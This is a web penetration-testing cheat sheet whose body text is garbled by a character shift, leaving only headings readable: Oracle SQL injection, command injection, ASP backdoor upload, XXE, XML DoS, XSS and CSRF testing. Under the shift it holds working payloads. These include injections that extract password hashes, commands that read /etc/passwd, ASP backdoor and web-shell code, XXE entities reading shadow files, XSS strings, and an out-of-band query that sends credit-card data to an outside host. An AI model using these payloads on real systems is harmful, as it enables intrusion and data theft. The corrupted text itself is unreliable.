VDB@MBNMUDQSSGDBNCDENQAXO@RR."(*$?2605&4?(1$EHKSDQ
MNQL@KKXXTNB@MRDDHEGDW?LNCDVNQJVHSG@KN@C?EHKD O@SGHMGDW

KHJDKN@C?EHKD WEE
ENQDSBO@RRVNQC TRT@KKXO@SG
VDB@MRDD@KNSNEHMENQL@SHNMR@ANTSSGDVDARDQUDQBNMEHFTQ@SHNMVHSG
OGOHMEN

42-26&3:
QDRTKSLXRPK?PTDQX ?(&5<PTDQX>

5QXSNTRDKN@C?EHKD
SNFDSSGDC@S@A@RDBNMMDBSHNMBQDCDMSH@KR NQSQXSNHMBKTCD@M
DWHRSHMFEHKDNMSGDVDARDQUDQVGHBGG@MCKDRSGDLXRPKBNMMDBS
3&LDLADQSG@SSGDPTNSDR@QDQDPTHQDC@MCRNHESGDDQQNQ@QDKHJD
DQQNQCAMD@Q=VVVQNNSO@SGO@FDOGO=
L@XADHSRADBNTRDSGDPTNSDR@QDMNS@KKNVDC VHSGRODBH@KEHKSDQTRDCENQ@MSHWRR
4N@SSGDDMCS
SQL Injection Against Oracle
Error Based SQL Injection

GSSO<RHSDBNL>O@FDOGO HCTSK?HM@CCQFDS?GNRS?@CCQDRR RDKDBSA@MMDQEQNL
UUDQRHNMVGDQDQNVMTL

GSSO<RHSDBNL>O@FDOGO HCTSK?HM@CCQFDS?GNRS?@CCQDRR 4&-&$5TRDQ'30.CT@K

5GHRRGNTKCVNQC@F@HMRS0Q@BKD H @MCF
GSSO<RHSDBNL>O@FDOGO HCb@MCBSWRXRCQHSGRWRM RDKDBSTRDQEQNLCT@K

5GHRHR@M@KSDQM@SHUDSG@SRGNTKCVNQJ@F@HMRSF
GSSO<RHSDBNL>O@FDOGO HCTSK?HM@CCQFDS?GNRS?@CCQDRR 4&-&$5FKNA@K?M@LD

'30.FKNA@K?M@LD

GSSO<RHSDBNL>O@FDOGO HCTSK?HM@CCQFDS?GNRS?@CCQDRR 4DKDBSFQ@MSDC?QNKDEQNL

RDKDBSQNVMTLQ FQ@MSDC?QNKDEQNLTRDQ?QNKD?OQHUR
VGDQDQ

GSSO<RHSDBNL>O@FDOGO HCTSK?HM@CCQFDS?GNRS?@CCQDRR 4DKDBSFQ@MSDC?QNKDEQNL
RDKDBSQNVMTLQ FQ@MSDC?QNKDEQNLTRDQ?QNKD?OQHUR
VGDQDQ

GSSO<RHSDBNL>O@FDOGO HCTSK?HM@CCQFDS?GNRS?@CCQDRR RDKDBS
RXR?BNMSDWS 64&3&/7 %#?/".&
'30.CT@K

Union Based SQL Injection

GSSO<RHSDBNL>O@FDOGO HCMTKKTMHNM@KKRDKDBSTRDQM@LD'30.@KK?TRDQR
GSSO<RHSDBNL>O@FDOGO HCMTKKTMHNM@KKRDKDBSBNMB@S TRDQM@LD
'30.
@KK?TRDQR
Obtaining the Current User's Password Hash in Oracle with UNION SELECT ALL
(Privileged Database User Account Required)
&MTLDQ@SDSGDMTLADQNEBNKTLMREQNLSGDNQHFHM@KPTDQXAXTSHKHYHMFSGD03%&3
#:SDBGMHPTD #DFHMVHSG@QDK@SHUDKXGHFGMTLADQSNSDRSVGDSGDQSGDO@FDKN@CR *E
RN CHUHCDAXG@KE *EMNS @CCAXNESG@SHMCDW 3HMRD@MCQDOD@SDUDQXSHLD
5GHMJNEHS@R@L@MT@KAHM@QXRD@QBG NMDQDPTDRS@S@SHLD
5@JDMNSDNEVG@SSGDO@FDKNNJRKHJDENQ@U@KHCPTDQXAXUHRHSHMF UHBSHLBNL
OQNCTBSR@RO HC
UHBSHLBNLOQNCTBSR@RO HC03%&3#:
*ESGDO@FDKN@CR@MDQQNQO@FDNQ@AK@MJO@FD SGDMTLADQNEBNKTLMREQNLS@AKD
ADHMFPTDQHDCHRADKNV
ADHMFPTDQHDCHRADKNV
ADHMFPTDQHDCHRADKNV
*ESGDO@FDKN@CRSGDU@KHCO@FDEQNLHC VDBNMBKTCDSGDQDV@RMNDQQNQ@MCSG@S
SGDMTLADQNEBNKTLMRHMSGDS@AKDADHMFPTDQHDCHR
4DDHE@MDLOSXO@FDVHKKKN@CENQ@MDF@SHUDHMCDWU@KTDAXUHRHSHMF
UHBSHLBNLOQNCTBSR@RO HC
*ESGDO@FDKN@CRVG@S@OOD@QRSNADSGDRJDKDSNM)5.-O@FDVHSGNTS@MXC@S@Q@SGDQ
SG@MQDCHQDBSHMFXNTSN@MDQQNQO@FD VDB@MBNMBKTCDSG@SHSHRKHJDKXVDVHKKAD@AKDSN
DWSQ@BSC@S@EQNLVHSGHMSGD)5.-
4HMBDSGDL@WHLTLMTLADQNEBNKTLMRHMSGDDW@LOKD@ANUDHR UHRHS
UHBSHLBNL
OQNCTBSR@RO HC6/*0/4&-&$5"--MTKK MTKK MTKK MTKK MTKK MTKK MTKK MTKK MTKK MTKK MTKK MTKK

#DFHMQDOK@BHMFNMDBNKTLM@S@SHLDVHSGDHSGDQ@MTLADQNQRSQHMF
"QDPTHQDLDMSSNRTBBDRRETKKXODQENQL@6/*0/4&-&$5"--@SS@BJHM0Q@BKDHRSG@SSGD
C@S@SXODRNEXNTQBNKTLMRLTRSL@SBGSGDBNKTLMSXODRNESGDNQHFHM@KPTDQX *MNSGDQ
VNQCR HEXNTUHRHS
UHBSHLBNL
OQNCTBSR@RO HC6/*0/4&-&$5"-- MTKK MTKK MTKK MTKK MTKK MTKK MTKK MTKK MTKK MTKK MTKK

:NTQFN@KHRSG@SHSKN@CRSGDR@LDO@FDXNTR@VENQUHBSHLBNLOQNCTBSR@RO HC *E
HSKNNJRKHJD@MDQQNQO@FDNQ@BNLOKDSDKXAK@MJO@FD XNTB@MBNMBKTCDSG@SSGDNQHFHM@K
PTDQXG@R@RSQHMFC@S@SXODENQSGDEHQRSBNKTLMNESGDPTDQXQ@SGDQSG@M@MHMSDFDQ *E
SG@SHRSGDB@RD DMSDQ
UHBSHLBNL
OQNCTBSR@RO HC6/*0/4&-&$5"--@ MTKK MTKK MTKK MTKK MTKK MTKK MTKK MTKK MTKK MTKK MTKK

*E)5.-HROQDRDMS KNNJENQ@@BG@Q@BSDQ@MXVGDQDVHSGHMSGDO@FD *EXNTG@UD
MNSENTMCHS BNMSHMTDQDOD@SHMFRSDOTMSHKXNTG@UDRTBBDRRETKKXENTMCDHSGDQ@M
HMSDFDQNQRSQHMFSG@SKN@CRVHSGHMSGDVDAO@FD *MSGHRDW@LOKD XNTG@UDBNKTLMR
@SXNTQCHRONR@K
-DSRR@XSG@SBNKTLMSVNFHUDRXNT@BG@Q@BSDQSG@SKN@CRHMSNSGDVDAO@FD 5G@SHR
VGDMXNTUHRHSSGHRO@FDXNTRTBBDRRETKKXRDD@@BG@Q@BSDQVHSGHMSGDVDAO@FDBNMSDMS
UHBSHLBNL
OQNCTBSR@RO HC6/*0/4&-&$5"--MTKK @ MTKK MTKK MTKK MTKK MTKK MTKK MTKK MTKK MTKK MTKK

'QNLGDQD BNMUDQSSGHR6/*0/4&-&$5RS@SDLDMSHMSNNMDSG@SVHKKCHROK@XSGD
O@RRVNQCG@RGENQSGDBTQQDMSC@S@A@RDTRDQ
UHBSHLBNL
OQNCTBSR@RO HC6/*0/4&-&$5"--MTKK TRDQ MTKK MTKK MTKK MTKK MTKK MTKK MTKK MTKK MTKK MTKKEQNL

UHBSHLBNL
OQNCTBSR@RO HC6/*0/4&-&$5"--MTKK O@RRVNQC MTKK MTKK MTKK MTKK MTKK MTKK MTKK MTKK MTKK MTKKEQ

*MD@BGQDPTDRS KNNJENQSGDQDRODBSHUD0Q@BKDC@S@A@RDTRDQM@LD@MCO@RRVNQCG@RG
5GDO@RRVNQCG@RGRGNTKCADCHROK@XDC@R@BG@Q@BSDQU@KTD
Blind SQL Injection
GSSO<RHSDBNL>O@FDOGO HC5&45
OQNCTBDR@FHUDMO@FD
GSSO<RHSDBNL>O@FDOGO HC5&45b@MC RDKDBSTRDQEQNLCT@K

4$055
OQNCTBDRSGDR@LDO@FD
GSSO<RHSDBNL>O@FDOGO HC5&45b@MC RDKDBSTRDQEQNLCT@K

'00
OQNCTBDR@ CHEEDQDMSO@FD
Out-Of-Band SQL Injection

GSSO<RHSDBNL>O@FDOGO HC4$055b@MC RDKDBSTSK?HM@CCQFDS?GNRS?@CCQDRR RDKDBS
TRDQEQNLCT@K
[[IDKD@QMRDBTQHSXNMKHMDBNL
EQNLCT@K
HRMNSMTKK
GSSO<RHSDBNL>O@FDOGO HC4$055b@MC RDKDBS

RTL KDMFSG TSK?GSSOQDPTDRS GSSOVVVKD@QMRDBTQHSXNMKHMDBNL
[[BBMTLADQ[[[[EM@LD[[[[KM@LD
EQNLBQDCHSB@QC

5GHRRGNTKCVNQC@F@HMRS0Q@BKD H @MCF
GSSO<RHSDBNL>O@FDOGO HC4$055b@MC 4&-&$54:4%#.4?-%"1*/*5 4&-&$5
TRDQEQNLCT@K
[[KD@QMRDBTQHSXNMKHMDBNL
'30.%6"-
HRMNSMTKK
5GHRHR@M@KSDQM@SHUDSG@SRGNTKCVNQJ@F@HMRSF
Heavy Queries
GSSO<RHSDBNL>O@FDOGO HC[[ RDKDBSEQNLCT@KVGDQD RDKDBSBNTMS
EQNL
@KK?TRDQRS @KK?TRDQRS @KK?TRDQRS @KK?TRDQRS @KK?TRDQRS
@MC RDKDBSTRDQ
EQNLCT@K
4$055

5GHRPTDQXK@RSR@ANTSRDBNMCR
GSSO<RHSDBNL>O@FDOGO HC[[ RDKDBSEQNLCT@KVGDQD RDKDBSBNTMS
EQNL
@KK?TRDQRS @KK?TRDQRS @KK?TRDQRS @KK?TRDQRS @KK?TRDQRS
@MC RDKDBSTRDQ
EQNLCT@K
9999

5GHRPTDQXK@RSRRDBNMCRNVDJMNVSGDTRDQHR4BNSS
$NLL@MC*MIDBSHNM
Identifying Command Injection Vulnerablilities
*MRNLDB@RDR HSL@XADONRRHAKDSNQTM@QAHSQ@QXBNLL@MCRSGQNTFGSGDVDA
@OOKHB@SHNM 5GHRVHKKADSQTDVGDM@VDARHSD@OOD@QRSNS@JDTRDQHMOTS@MCTONM
RTALHSSHMFSGDHMOTS SGDCXM@LHB@KKXFDMDQ@SDCNTSOTSKNNJRRHLHK@QSNSGDQDRTKSNE@
BNLL@MCADHMFDWDBTSDC
Command Injection: Appending a Command
*E@VDARHSDG@R@+@U@RBQHOSCQNOCNVMLDMTVHSGBNLL@MCRKHJDOHMF EHMFDQ @MC
SQ@BDQNTSD @MCSGHRLDMTHRQHFGSADRHCD@VDAENQLSG@SS@JDRHM@MHO@CCQDRR XNT
DMSDQ@U@KHCHO@CCQDRR@MCRDKDBSOHMF 0ARDQUDSGDQDRTKSR CNSGDXKNNJRHLHK@QSN
SGDQDRTKSHEXNTQ@MOHMF
4XRSDL
ETMBSHNM
*SHRKHJDKXSG@S@RSQHMFHRADHMFBNMB@SDM@SDC@MCO@RRDCSN@
4XRSDL OHMFHO

*MSGHRB@RD @SSDLOSSN@OODMC@M@CCHSHNM@KBNLL@MCSNSGDDMCNESGDRSQHMF "ESDQ

RDKDBSHMFOHMFEQNLSGDCQNOCNVMLDMT HMSGDHO@CCQDRRENQL SXOD
B@SDSBO@RRVC
NQSXOD B@SDSBO@RRVC

Command Injection: Injecting Code to Run Commands

4NLDVDARHSDRL@XG@UD@AHFENQLSG@SHRHMSDMCDCSNHMSDQOQDSRNLDBNCD SGDMVGDM
SGDBNCDHRQTMNMSGDVDARHSD SGDNTSOTSHRCHROK@XDCVHSGHMSGDO@FD 5GHRL@XAD
SQTDVHSGSTSNQH@KRHSDRSG@SG@UD@MNOSHNMSN&MSDQ@AKNBJNEBNCD *MSGDRDB@RDR
@SSDLOSSNDMSDQBNCDSG@SVHKKB@KKSGD4XRSDLETMBSHNM 'NQDW@LOKD
4XRSDL B@S
DSBO@RRVC

#@BJCNNQ6OKN@CHMF"SS@BJR
8DA@OOKHB@SHNMRNESDM@KKNVENQEHKDRRTBG@RHL@FDR@MCCNBTLDMSRSNADTOKN@CDCSN
SGDQDLNSDRDQUDQ *SBNTKCADONRRHAKDSG@SSGDX@QDMNSOQNODQKXUDQHEXHMFSGDEHKDSXOD
OQHNQSN@KKNVHMFHSSNADTOKN@CDC *ESGHRHRSQTD HSBNTKCADONRRHAKDSNTOKN@C@
A@BJCNNQ 5NSDRSSGHRNTS ENKKNVSGDRDRSDOR
%DSDQLHMDSGDK@MFT@FDTRDCAXSGD@OOKHB@SHNM "41+411)1

6OKN@C@KDFHSHL@SDEHKD@MC@M@KXYDSGD)5.-RNTQBDBNMS@HMHMFSGDKHMJSNXNTQEHKD
5@JDMNSDNESGDENKKNVHMF
8@RSGDEHKDQDM@LDCNQJDOSSGDR@LD@RSGDEHKDSG@SXNTTOKN@CDC
%DSDQLHMDSGDETKK63*SNSGDTOKN@CDCSNJMNVVGDQDSNAQNVRDSNNTQBTRSNL
A@BJCNNQ
"SSDLOSSNTOKN@C@A@BJCNNQ *MSGDB@RDNESGD"41A@BJCNNQ SGHR@KRNQDPTHQDR@
BNOXNEBLCDWDSNADTOKN@CDC@RVDKK
*MUNJDSGDA@BJCNNQ O@RRHMFXNTQRGDKKBNLL@MCRUH@SGDO@Q@LDSDQU@QH@AKD
1KD@RDMNSDSG@S45%&33LDRR@FDRVHKKMNSADUHDV@AKDVGDMQTMMHMFBNLL@MCRVHSG
SGD"41A@BJCNNQBNCDDW@LOKD
ASP Backdoor Code
/NSD 5GHRBNCDQDPTHQDR@BNOXNEBLCDWDSNADTOKN@CDC *MSGHRDW@LOKD HSHR
QDM@LDCYYYDWD "41#@BJCNNQBNCDAX.$
4DQUDQ$QD@SD0AIDBS VRBQHOSRGDKK
DWDB 4DQUDQ.@O1@SG
=YYYDWDB
QDPTDRS BLC

RSCNTSQD@C@KK
5GDA@BJCNNQB@KKDCETM@ROHRHMUNJDC@RENKKNVR
VVVUHBSHLBNLO@SGSNTOKN@CRETM@RO BLCMDSRS@S @M
*ESGDRHSDOQDUDMSRXNTEQNLTOKN@CHMF@BLCDWDEHKD GDQD@QDRNLDNSGDQTRDETK"41
SNNKR
CHQ@ROAX+@BNA(H@MM@MSNMHN HMUNJDC@RENKKNVR VVVUHBSHLBNLO@SGSN
TOKN@CRCHQ@RO O@SGB=
GSLK
ANCX

%HLNAI'40 NAI'HKD NAI'NKCDQ
4DSNAI'404DQUDQ$QD@SD0AIDBS 4BQHOSHMF'HKD4XRSDL0AIDBS
4DSNAI'NKCDQNAI'40(DS'NKCDQ 3DPTDRS2TDQX4SQHMF O@SG
'NQ&@BGNAI'HKDHMNAI'NKCDQ'HKDR
3DRONMRD8QHSDNAI'HKD/@LDAQ
/DWS
4DSNAI'NKCDQ/NSGHMF
4DSNAI'40/NSGHMF

ANCX
GSLK
B@S@ROAX+@BNA(H@MM@MSNMHN HMUNJDC@RENKKNVR VVVUHBSHLBNLO@SGSN
TOKN@CRB@S@RO O@SGB=ANNSHMH
GSLK
ANCX

$NMRS'NQ3D@CHMF
$NMRS'NQ8QHSHMF
$NMRS'NQ"OODMCHMF
$NMRS5QHRS@SD6RD%DE@TKS
$NMRS5QHRS@SD5QTD
$NMRS5QHRS@SD'@KRD
%HLN'4
%HLN'HKD
%HLN4SQD@L
4DSN'44DQUDQ$QD@SD0AIDBS 4BQHOSHMF'HKD4XRSDL0AIDBS
4DSN'HKDN'4(DS'HKD 3DPTDRS2TDQX4SQHMF O@SG
4DSN4SQD@LN'HKD0ODM"R5DWS4SQD@L 'NQ3D@CHMF 5QHRS@SD6RD%DE@TKS
%N8GHKD/NSN4SQD@L"S&MC0E4SQD@L
R3DBNQCN4SQD@L3D@C-HMD
3DRONMRD8QHSD R3DBNQC
-NNO
N4SQD@L$KNRD

ANCX
GSLK
*E@MXA@BJCNNQEHKDR@OOD@QSNADTOKN@CDCRTBBDRRETKKXATSE@HKSNOQNCTBD@MXNTSOTS HS
BNTKCADSG@SSGDTOKN@CENKCDQCNDRMNSG@UDDWDBTSHNMOQHUHKDFDR *MSGHRB@RD @SSDLOS
SNLNCHEXSGDO@Q@LDSDQU@QH@AKDRNESGDTOKN@C@OOKHB@SHNM@MCRDDHEHSHRONRRHAKDSN
ODQENQL@CHQDBSNQXSQ@UDQR@K@SS@BJNMSGDCDRSHM@SHNMENKCDQ SGDMAQNVRDSN@ENKCDQ
SG@SHRGNKCHMFSGDKDFHSHL@SDVDA@OOKHB@SHNMBNCD@MCCQNOSGDA@BJCNNQSGDQD *EHSHR
MNSONRRHAKDSNAQD@JNTSNESGDTOKN@CENKCDQVHSGMNDWDBTSHNMOQHUHKDFDR @SSDLOSSN@S
KD@RSOTS@QAHSQ@QX)5.-+@U@RBQHOSHMSN@EHKD 5G@SRGNTKCFDSQDMCDQDCNMSGDRDQUDQ
@MCMNSDC@R@ODQRHRSDMS944UTKMDQ@AHKHSX
)DQD@QDRNLDVDARGDKKR
GSSOLHBG@DKC@VNQFOQNIDBSRVABUAS@QFY
GSSONODMK@ARNQFG@BJDQ?VDAJHSS@QFY
GSSOODMSDRSLNMJDXMDSSNNKROGOEHMCRNBJRGDKKOGOEHMCRNBJ
RGDKKS@QFY
GSSOODMSDRSLNMJDXMDSSNNKROGOQDUDQRDRGDKKOGOQDUDQRD
RGDKKS@QFY
GSSOODMSDRSLNMJDXMDSSNNKRODQKQDUDQRDRGDKKODQKQDUDQRD
RGDKKS@QFY
XML Attacks
XML Content Attack Strings
<$%"5"<RBQHOSU@QMVGHKD SQTD
ZM\RBQHOS>>
WLKUDQRHNM
DMBNCHMF*40 ENN<$%"5"<>>4$3*15<$%"5"<>>@KDQS ID
<$%"5"<>>
4$3*15<$%"5"<>>ENN
WLKUDQRHNMDMBNCHMF*40 ENN<$%"5"<NQNQ
>>ENN
WLKUDQRHNMDMBNCHMF*40 %0$5:1&ENN<&-&.&/5ENN
"/:&/5*5:WWD4:45&.EHKDBANNSHMH>ENNWWDENN
"/:&/5*5:WWD4:45&.EHKDDSBO@RRVC>ENNWWDENN
"/:&/5*5:WWD4:45&.EHKDDSBRG@CNV>ENNWWDENN
"/:&/5*5:WWD4:45&.EHKDCDUQ@MCNL>ENNWWDENN
XML DoS Attack

%N4BNMCHSHNMRB@MADB@TRDCNML@MXCHEEDQDMSKDUDKR RNBQD@SHUHSXHRDRRDMSH@K0MD
BNLLNMDW@LOKDHR@ATRHMF@O@QRDQbRG@MCKHMFNE%5%QDBTQRHNMAXHMIDBSHMFRNLDSGHMF
KHJDSGHRHMSNKDFHSHL@SD9.-
%0$5:1&ENNA@Q<
&/5*5:WGHSGDQD&/5*5:WWW&/5*5:WWW&/5*5:
WWW&/5*5:WWW

&/5*5:WWW&/5*5:WWW&/5*5:W
WW&/5*5:WWW&/5*5:WWW
&/5*5:WWW>
ENNA@QWENNA@Q
5G@SbR@KNSNESXOHMF VDCNMbSCNSG@S@ROQNFQ@LLDQR)DQDHR@RHLOKDOXSGNMRBQHOS
SG@SCNDRSGHR
HLONQSRXR
ENQHHMQ@MFD

WH
RXRRSCNTSVQHSD &/5*5:WR=WRWR= H W W
*EXNTHMIDBSDMNTFG SG@SHR HMR@MD@LNTMSRNE

C@S@CHQDBSKXHMSNSGD9.-O@XKN@C
@MNSGDQSXODNE%N4BNMCHSHNML@XAD@BGHDUDC5@JDENQDW@LOKDSGDENKKNVHMF
HMIDBSHNM

VRRD4DBTQHSX
"SS@BJ5@F"SS@BJ7@KTD"SS@BJ5@F

VRRD4DBTQHSX

*L@FHMDSGHR"SS@BJ5@FDKDLDMSADHMFHMIDBSDCSHLDR ENQHMRS@MBD.DRRHMFVHSG
SGD@BST@KRSQTBSTQDNERDDLHMFKXKDFHSHL@SD SNSGDO@QRDQ
9.-HMSGHRV@XVHKKENQBDSGD
O@QRDQSNSQX@MCCD@KVHSGSGDC@S@OQDRDMSDCSNHS4NLDSGQDRGNKCVHKKDUDMST@KKXFDS
GHS5G@SSGQDRGNKCHRVG@SXNT@QD@ESDQ RNXNTLTRSCNBTLDMSHS@MCSGDQDODQBTRRHNMR
NEHSFDSSHMFQD@BGDC
)TFDA@RDDMBNCDCRSQHMFRVHKKFDSSQD@SDC@RAHM@QXC@S@ RNHMIDBSHMFRNLDSGHMFKHJD
SGHRHMSNSGD9.-O@XKN@CL@X@KRNXHDKCRNLDHMSDQDRSHMFQDRTKSR

VRRD4DBTQHSX
"SS@BJ5@F
"SS@BJ7@KTD
)GMMDNP3LB)4O1L&18@5@K1$/C,&HM3#(/1U0OY8/NNI':WI"K/Y$-WU9ELI$B"
VN@3YD&K$#BB(NMF:KLJCC@X##YIBB),BXV%JM,N+:AVS@CWUX(6+DMSI2

BHVYD5(8F7QN@2C61Q%*+8RWYS8:@VHNA$58"/DJF,Q
"MKE0C7UU3JD4W
;4Y92XT'DPRQ+HC)EVFRMU21"D6
"SS@BJ5@F

VRRD4DBTQHSX

XML Parser Overload
:NTB@MNUDQKN@CSGDO@QRDQHEXNTFHUDHSDMNTFGRSQ@MFDC@S@SG@SHSSQHDRSN@BST@KKX
OQNODQKXG@MCKD)DQDHR@MDW@LOKD

VRRD4DBTQHSX
"SS@BJ5@FS@F99S@F99S@F99S@F99
"SS@BJ7@KTD
"SS@BJ5@F
"SS@BJ5@FS@F9S@F9S@F9S@F9
"SS@BJ7@KTD
"SS@BJ5@F

VRRD4DBTQHSX

&MUHRHNM@M@SS@BJVGDQDSGDANFTR@SSQHATSDRADHMFHMIDBSDCVDQDPTHSDK@QFDHMMTLADQ
5GHRVNTKCOTSPTHSD@RSQ@HMNMSGDO@QRDQ"MNSGDQ@SS@BJSDBGMHPTDHREDDCHMFSGD
O@QRDQ9.-SG@SHRHMBNLOKDSD MNSVDKKENQLDC NQMNSU@KHC`ENQDW@LOKD BNLAHMHMF
GTFD@LNTMSRNEC@S@VHSG@O@SSDQMNEMNBKNRHMFS@FR4NLDSGHMFKHJDSGHRBNTKCG@UD
@MHMSDQDRSHMFDEEDBSNMSGDS@QFDSHMEQ@RSQTBSTQD

VRRD4DBTQHSX
"SS@BJ5@F
"SS@BJ5@F
"SS@BJ5@F

"SS@BJ5@F
"SS@BJ5@F
"SS@BJ5@F
VRRD4DBTQHSX

XML Injection
"ESDQXNTTMCDQRS@MCSGDC@S@XNT@QDTO@F@HMRS HSL@XADONRRHAKDSNCNRNLD
HMIDBSHNMCHQDBSKXHMSNSGD9.-@MCRDDGNVSGDRDQUHBDQDRONMCR5GDNMDS@BSHBXNT
RGNTKC@KV@XRSQXHRE@KRDKXSDQLHM@SHMF@S@F L@JHMF@MHMIDBSHNM @MCSGDMOQNODQKX
SDQLHM@SHMFSNSQX@MCENQBDOQNBDRRHMFNEXNTQLNCHEHDC9.-)DQDHR@RHLOKDDW@LOKD
VHSGSGDHMIDBSHNMHMANKC
DLOKNXDD
DLO*%DLO*%
DLO/@LD+ND5DRSDQDLO/@LD
DLO&L@HKIND!DW@LOKDBNLDLO&L@HKDLO*%DLO*%
DLO&L@HKRNLD!SGHMFBNLDLO&L@HK

DLOKNXDD
.@MT@K944
Identifying XSS
-DSRRS@QSVHSGRNLDONOTK@QATSFDMDQHB944O@XKN@CR&@BGO@XKN@CHRDMBNCDCHMGDW
VHSGSGDDWBDOSHNMNESGDQCNMDVGHBGHRO@QSH@KKXDMBNCDCHMGDW @MCG@RSGD@BST@K
@KDQSLDRR@FDDMBNCDCHMCDBHL@K*LLDCH@SDKXTMCDQD@BGDMBNCDCO@XKN@CHRSGDGDW
CDBHL@KSN@RBHHBNMUDQRHNMNESGDO@XKN@CRNXNTB@MFDS@ADSSDQHCD@NEVG@SHRFNHMF
NM
Payloads:
&$RBQHOS&@KDQSID$'RBQHOS&
BNMUDQRHNM RBQHOS@KDQS ID
RBQHOS
&*.(43$=I@U@RBQHOS@KDQS ID
=
BNMUDQRHNM *.(43$=I@U@RBQHOS@KDQS ID
=
&RBQHOS@KDQS 4SQHMFEQNL$G@Q$NCD

BNMUDQRHNM RBQHOS@KDQS 4SQHMFEQNL$G@Q$NCD ID3NBJR%@944
RBQHOS
=IDZ
\
BNMUDQRHNM =IDZ
\
@KDQS
=@KDQS
@KDQS
=@KDQS
&$
4$3*15&&&$4$3*15&@KDQS ID
$
4$3*15&Z\
\@KDQS
ETMBSHNM
BNMUDQRHNM @KDQS
=@KDQS
@KDQS
=@KDQS

4$3*154$3*15@KDQS ID
4$3*15Z\
\@KDQS
ETMBSHNM
SDWS@QD@RBQHOS@KDQS ID
RBQHOS
BNMUDQRHNM SDWS@QD@RBQHOS@KDQS ID
RBQHOS
&$RBQHOS&$RBQHOS&@KDQS
$RBQHOS&
BNMUDQRHNM RBQHOSRBQHOS@KDQS
RBQHOS
Attacking a URL
.XLDSGNCNKNFXENQSGHRHR@KNSKHJDGNV*FN@ESDQ42-*MIDBSHNM-NNJENQO@Q@LDSDQ
O@RRHMFHMSGD63-
&W@LOKD
GSSOVVVHBDBTADBNL BNMSDMSMDVR
*MSGHRB@RDVDRDDSG@SMDVRHRSGDO@Q@LDSDQADHMFO@RRDCSNBNMSDMS4NMNVQHFGS
@KNMFSGDR@LDKHMDRNEVG@SVDCNVHSG42-HMIDBSHNMVDB@MHMRDQSD@BGNENTQ944
O@XKN@CRHMSNSGD63-AXITRSQDOK@BHMFSGDMDVRO@Q@LDSDQVHSGNTQ944O@XKN@C
GSSOVVVHBDBTADBNL BNMSDMS<*/4&359441":-0"%)&3&>
"KKXNTCNHRITRSV@SBGENQ@ONOTOD@BGSHLDVDHMRDQSNTQO@XKN@C
"ESDQRNLDLDRRHMF@QNTMC*ENTMCSG@SSGHRO@XKN@CRGNVMADKNVVNQJDC ATSHSNMKX
VNQJDCVHSGSGD@KDQSRSQHMFADHMFMTLDQHBHMSGHRB@RD
&$RBQHOS&$RBQHOS&@KDQS
$RBQHOS&
4N@ESDQCNHMFRNLDSGHMJHMF@ANTSHS*EHFTQDCVDKKVGXMNSO@RRSGD@KDQSRSQHMFHM
CDBHL@K
GSSOVVVHBDBTADBNL BNMSDMS&$
RBQHOS&$RBQHOS&@KDQS 4SQHMFEQNL$G@Q$NCD
RBQHOS&
4TQDDMNTFGSGHRVNQJDCAD@TSHETKKX
Attacking a search box
1@RSD@MXD@BGNESGDO@XKN@CRKHRSDC@ANUDHMSGDVDARHSDRD@QBGANW
XSS in the referrer
<ID!-HMTW-@OSNO]>MBKD@QMRDBTQHSXNMKHMDBNL
(&5)551
3DEDQDQRBQHOS@KDQS UTKMDQ@AKD
RBQHOS
XSS in the user-agent
*MEHQDENWXNTB@MSXOD@ANTSBNMEHFHMSGD@CCQDRRA@Q @MCRD@QBGENQSGDVNQCTRDQ
5GDMBG@MFDSGDTRDQ@FDMSSNADXNTQHMIDBSHNM
.@MT@K$QNRR4HSD3DPTDRS'NQFDQX
$43'5DRSDQ
GSSOVVVNV@RONQFHMCDWOGO$@SDFNQX08"41?$43'5DRSDQ?1QNIDBS
GSSOVVVNV@RONQFHMCDWOGO$43'5DRSDQ?6R@FD
Quick Steps
5GDENKKNVHMFHR@MNTSKHMDNESGDRSDORMDBDRR@QXSNK@TMBG@MCTSHKHYDSGD$43'5DRSDQ
RUMBGDBJNTSGSSONV@ROBRQESDRSDQFNNFKDBNCDBNLRUMSQTMJ
NV@ROBRQESDRSDQQD@CNMKX
BCNV@ROBRQESDRSDQQD@CNMKXL@HM$43'5DRSDQCHRS
I@U@I@Q08"41$43'5DRSDQI@Q
$NMEHFTQDAQNVRDQSNOQNWXSGQNTFG$43'5DRSDQ
3DBNQCSGDDWDBTSHNMNE@ATRHMDRRETMBSHNM
.NCHEXSGDO@Q@LDSDQRNESGDQDBNQCDCATRHMDRRETMBSHNM
(DMDQ@SD@M)5.-QDONQSSG@SB@QQHDRNTSSGDATRHMDRRETMBSHNM
*M@RDO@Q@SDAQNVRDQVHMCNV @MC@RDO@Q@SDTRDQ
UHDVSGDFDMDQ@SDC)5.EHKD
*ESGD@BSHNMV@RRTBBDRRETKKXB@QQHDCNTS SGDMSGD@OOKHB@SHNMHRUTKMDQ@AKDSN
$43'
Launch OWASP CSRFTester

5GD$43'5DRSDQCHRSQHATSHNMBNMS@HMRSGQDDEHKDRQTMA@S 08"41$43'5DRSDQI@Q
@MCBNMBTQQDMSI@Q5GDQTMA@SRBQHOSBNMEHFTQDRSGDBK@RRO@SGSNHMBKTCDSGDQDPTHQDC
I@QR@MCHMUNJDRSGD@OOQNOQH@SDL@HMBK@RR$TQQDMSKX SGDA@SBGRBQHOS@RRTLDRXNTQ
+%,QTMSHLDDWHRSRTMCDQ$="OO4DB8NQJADMBG=ICJ=IQD0AUHNTRKX SGHRVHKKMNSADSGD
BNQQDBSKNB@SHNMNEXNTQ+7..@JDRTQDXNT update the JAVA_HOME environment
variable HMQTMA@SADENQD@SSDLOSHMFSNDWDBTSDSGDA@SBGEHKD"RRTLHMFOQNODQ
BNMEHFTQ@SHNM DWDBTSHMFQTMA@SRGNTKCK@TMBG$43'5DRSDQ*E@MDQQNQNBBTQR DUHCDMS
VGDMSGDBNLL@MCKHMDHMSDQE@BDPTHBJKXCHR@OOD@QR BNMRHCDQNODMHMFTO@RDO@Q@SD$-*
@MC$%CHQDBSKXSNSGDENKCDQNEXNTQQTMA@SEHKD@MCDWDBTSDHSUH@BNLL@MCKHMD"MX
DQQNQRSG@SL@XNBBTQVHKKCHROK@XSNRSCNTS
Record Execution of Business Functions

0MBDSGD$43'5DRSDQKN@CRRTBBDRRETKKX VDLTRSQDBNQC@SQ@MR@BSHNMSG@SVDV@MSSN
SDRSENQ$43''HQRS VDLTRSBNMEHFTQDSGDAQNVRDQSNOQNWX@KK)551SQ@EEHBSGQNTFG
$43'5DRSDQ8DB@MBNMEHFTQDSGHROQNWXADG@UHNQHM'HQDENW NM-HMTW
TRHMFSGD&CHS
